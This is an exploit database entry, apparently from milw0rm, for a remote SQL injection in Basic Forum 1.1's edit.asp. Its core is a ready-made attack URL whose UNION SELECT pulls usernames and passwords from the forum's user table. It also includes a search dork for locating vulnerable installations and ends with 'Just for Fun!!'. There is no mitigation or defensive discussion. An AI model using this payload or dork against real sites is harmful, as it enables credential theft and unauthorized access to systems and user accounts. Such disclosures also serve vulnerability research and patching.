Basic Forum 1.1 - 'edit.asp' SQL Injection

EDB-ID:

2848

Author:

bolivar

Type:

webapps

Platform:

ASP

Published:

2006-11-25

# Title   :  basicforum v 1.1 (edit.asp) Remote SQL Injection Vulnerability
# Author  :  bolivar
# Dork    :  "This script created by www.script.canavari.com"

---------------------------------------------------------------------------

http://[target]/[path]/edit.asp?type=message&id=-1+union+select+kullanici,sifre+from+uyeler

---------------------------------------------------------------------------
# Just for Fun!!

# milw0rm.com [2006-11-25]